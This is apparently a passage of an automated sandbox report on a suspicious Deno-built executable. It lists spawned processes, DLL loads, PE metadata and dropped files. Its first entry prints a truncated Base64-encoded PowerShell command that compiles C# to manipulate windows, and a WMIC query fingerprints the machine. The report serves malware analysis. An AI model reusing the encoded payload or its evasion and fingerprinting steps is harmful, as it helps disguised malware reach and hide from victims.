      Source: C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Encoded WwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAJwB7ACIAUwBjAHIAaQBwAHQAIgA6ACIAYQBXAFkAZwBLAEMAMQB1AGIAMwBRAGcASwBGAHQAVABlAFgATgAwAFoAVwAwAHUAVABXAEYAdQBZAFcAZABsAGIAVwBWAHUAZABDADUAQgBkAFgAUgB2AGIAVwBGADAAYQBXADkAdQBMAGwAQgBUAFYASABsAHcAWgBVADUAaABiAFcAVgBkAEoAMQBkAHAAYgBqAE0AeQBKAHkAawB1AFYASABsAHcAWgBTAGsAZwBlAHcAMABLAEkAQwBBAGcASQBFAEYAawBaAEMAMQBVAGUAWABCAGwASQBFAEEAaQBEAFEAbwBnAEkAQwBBAGcAZABYAE4AcABiAG0AYwBnAFUAMwBsAHoAZABHAFYAdABPAHcAMABLAEkAQwBBAGcASQBIAFYAegBhAFcANQBuAEkARgBOADUAYwAzAFIAbABiAFMANQBTAGQAVwA1ADAAYQBXADEAbABMAGsAbAB1AGQARwBWAHkAYgAzAEIAVABaAFgASgAyAGEAVwBOAGwAYwB6AHMATgBDAGcAMABLAEkAQwBBAGcASQBIAEIAMQBZAG0AeABwAFkAeQBCAGoAYgBHAEYAegBjAHkAQgBYAGEAVwA0AHoATQBpAEIANwBEAFEAbwBnAEkAQwBBAGcASQBDAEEAZwBJAEYAdABFAGIARwB4AEoAYgBYAEIAdgBjAG4AUQBvAEkAbgBWAHoAWgBYAEkAegBNAGkANQBrAGIARwB3AGkASwBWADAATgBDAGkAQQBnAEkAQwBBAGcASQBDAEEAZwBjAEgAVgBpAGIARwBsAGoASQBIAE4AMABZAFgAUgBwAFkAeQBCAGwAZQBIAFIAbABjAG0ANABnAFMAVwA1ADAAVQBIAFIAeQBJAEUAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAYwBvAEsAVABzAE4AQwBnADAASwBJAEMAQQBnAEkAQwBBAGcASQBDAEIAYgBSAEcAeABzAFMAVwAxAHcAYgAzAEoAMABLAEMASgAxAGMAMgBWAHkATQB6AEkAdQBaAEcAeABzAEkAaQBsAGQARABRAG8AZwBJAEMAQQBnAEkAQwBBAGcASQBGAHQAeQBaAFgAUgAxAGMAbQA0ADYASQBFADEAaABjAG4ATgBvAFkAVwB4AEIAYwB5AGgAVgBiAG0AMQBoAGIAbQBGAG4AWgBXAFIAVQBlAFgAQgBsAEwAawBKAHYAYgAyAHcAcABYAFEAMABLAEkAQwBBAGcASQBDAEEAZwBJAEMAQgB3AGQAVwBKAHMAYQBXAE0AZwBjADMAUgBoAGQARwBsAGoASQBHAFYANABkAEcAVgB5AGIAaQBCAGkAYgAyADkAcwBJAEYATgBvAGIAMwBkAFgAYQBXADUAawBiADMAYwBvAFMAVwA1ADAAVQBIAFIAeQBJAEcAaABYAGIAbQBRAHMASQBHAGwAdQBkAEMAQgB1AFEAMgAxAGsAVQAyAGgAdgBkAHkAawA3AEQAUQBvAGcASQBDAEEAZwBmAFEAMABLAEkAawBBAE4AQwBuADAATgBDAG0AWgAxAGIAbQBOADAAYQBXADkAdQBJAEUAZABsAGQARQBGAGoAZABHAGwAMgBaAFYAZABwAGIAbQBSAHYAZAAxAFIAcABkAEcAeABsAEsAQwBrAGcAZQB3ADAASwBJAEMAQQBnAEkAQwBSAG8AVgAyADUAawBJAEQAMABnAFcAMQBkAHAAYgBqAE0AeQBYAFQAbwA2AFIAMgBWADAAUgBtADkAeQBaAFcAZAB5AGIAMwBWAHUAWgBGAGQAcABiAG0AUgB2AGQAeQBnAHAARABRAG8AZwBJAEMAQQBnAEoASABOAGkASQBEADAAZwBUAG0AVgAzAEwAVQA5AGkAYQBtAFYAagBkAEMAQgBUAGUAWABOADAAWgBXADAAdQBWAEcAVgA0AGQAQwA1AFQAZABIAEoAcABiAG0AZABDAGQAVwBsAHMAWgBHAFYAeQBLAEQASQAxAE4AaQBrAE4AQwBpAEEAZwBJAEMAQgBiAFYAMgBsAHUATQB6AEoAZABPAGoAcABIAFoAWABSAFgAYQBXADUAawBiADMAZABVAFoAWABoADAASwBDAFIAbwBWADIANQBrAEwAQwBBAGsAYwAyAEkAcwBJAEMAUgB6AFkAaQA1AEQAWQBYAEIAaABZADIAbAAwAGUAUwBrAGcAZgBDAEIAUABkAFgAUQB0AFQAbgBWAHMAYgBBADAASwBJAEMAQQBnAEkASABKAGwAZABIAFYAeQBiAGkAQQBrAGMAMgBJAHUAVgBHADkAVABkAEgASgBwAGIAbQBjAG8ASwBRADAASwBmAFEAMABLAFoAbgBWAHUAWQAzAFIAcABiADIANABnAFMARwBsAGsAWgBVAEYAagBkAEcAbAAyAFoAVgBkAHAAYgBtAFIAdgBkAHkAZwBwAEkASABzAE4AQwBpAEEAZwBJAEMAQQBrAGEARgBkAHUAWgBDAEEAOQBJAEYAdABYAGEAVwA0AHoATQBsADAANgBPAGsAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAYJump to behavior
      Source: C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" csproduct get uuid /valueJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\at4aznwk\at4aznwk.cmdline"Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD9CB.tmp" "c:\Users\user\AppData\Local\Temp\at4aznwk\CSC4E83F948CA91455DAC7F3163ADDBB8D.TMP"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\f2b3v2t5\f2b3v2t5.cmdline"
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE63E.tmp" "c:\Users\user\AppData\Local\Temp\f2b3v2t5\CSCCC5958D27FB74F62AE119AE083742021.TMP"Jump to behavior
      Source: C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exeSection loaded: dbghelp.dllJump to behavior
      Source: C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exeSection loaded: winmm.dllJump to behavior
      Source: C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
      Source: dGhlYXB0Z3JvdXA=-free.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
      Source: dGhlYXB0Z3JvdXA=-free.exeStatic PE information: Image base 0x140000000 > 0x60000000
      Source: dGhlYXB0Z3JvdXA=-free.exeStatic file information: File size 34433319 > 1048576
      Source: dGhlYXB0Z3JvdXA=-free.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x155e800
      Source: dGhlYXB0Z3JvdXA=-free.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x9fb200
      Source: dGhlYXB0Z3JvdXA=-free.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
      Source: dGhlYXB0Z3JvdXA=-free.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
      Source: dGhlYXB0Z3JvdXA=-free.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
      Source: dGhlYXB0Z3JvdXA=-free.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: dGhlYXB0Z3JvdXA=-free.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
      Source: dGhlYXB0Z3JvdXA=-free.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
      Source: dGhlYXB0Z3JvdXA=-free.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: dGhlYXB0Z3JvdXA=-free.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: Binary string: 8C:\Users\user\AppData\Local\Temp\f2b3v2t5\f2b3v2t5.pdbhP source: powershell.exe, 00000007.00000002.2268510659.000001C3815D6000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: D:\a\deno\deno\target\release\deps\deno.pdb source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000000.2046501543.00007FF6773EE000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: *on.pdb; source: powershell.exe, 00000003.00000002.2264583068.00000254D0FFE000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb28 source: powershell.exe, 00000003.00000002.2264583068.00000254D0FD4000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbT source: powershell.exe, 00000003.00000002.2265232590.00000254D12FF000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Core.pdb9 source: powershell.exe, 00000003.00000002.2265232590.00000254D12D0000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: n.pdb source: powershell.exe, 00000003.00000002.2264583068.00000254D0FD4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2327769536.000001C3F3122000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbt source: powershell.exe, 00000007.00000002.2328766048.000001C3F3380000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: 8C:\Users\user\AppData\Local\Temp\f2b3v2t5\f2b3v2t5.pdb source: powershell.exe, 00000007.00000002.2268510659.000001C3815D6000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: 8C:\Users\user\AppData\Local\Temp\at4aznwk\at4aznwk.pdb source: powershell.exe, 00000003.00000002.2234723049.00000254BA357000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: tion.pdb source: powershell.exe, 00000003.00000002.2263615074.00000254D0F65000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2265232590.00000254D12FF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2328766048.000001C3F3380000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: 6?ystem.Core.pdb.# source: powershell.exe, 00000003.00000002.2263615074.00000254D0F65000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb' source: powershell.exe, 00000007.00000002.2328766048.000001C3F3380000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: 8C:\Users\user\AppData\Local\Temp\at4aznwk\at4aznwk.pdbhP source: powershell.exe, 00000003.00000002.2234723049.00000254BA357000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000007.00000002.2327416942.000001C3F30DE000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: re.pdb source: powershell.exe, 00000003.00000002.2263615074.00000254D0F65000.00000004.00000020.00020000.00000000.sdmp
      Source: dGhlYXB0Z3JvdXA=-free.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
      Source: dGhlYXB0Z3JvdXA=-free.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
      Source: dGhlYXB0Z3JvdXA=-free.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
      Source: dGhlYXB0Z3JvdXA=-free.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
      Source: dGhlYXB0Z3JvdXA=-free.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\at4aznwk\at4aznwk.cmdline"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\f2b3v2t5\f2b3v2t5.cmdline"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\at4aznwk\at4aznwk.cmdline"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\f2b3v2t5\f2b3v2t5.cmdline"
      Source: dGhlYXB0Z3JvdXA=-free.exeStatic PE information: section name: _RDATA
      Source: C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exeCode function: 0_3_00000199000C7E8E push edx; ret 0_3_00000199000C8305
      Source: C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exeCode function: 0_3_00000199000C4556 push edx; ret 0_3_00000199000C49F2
      Source: C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exeCode function: 0_3_00000199000C626F push edx; ret 0_3_00000199000C6298
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\f2b3v2t5\f2b3v2t5.dllJump to dropped file
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\at4aznwk\at4aznwk.dllJump to dropped file
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
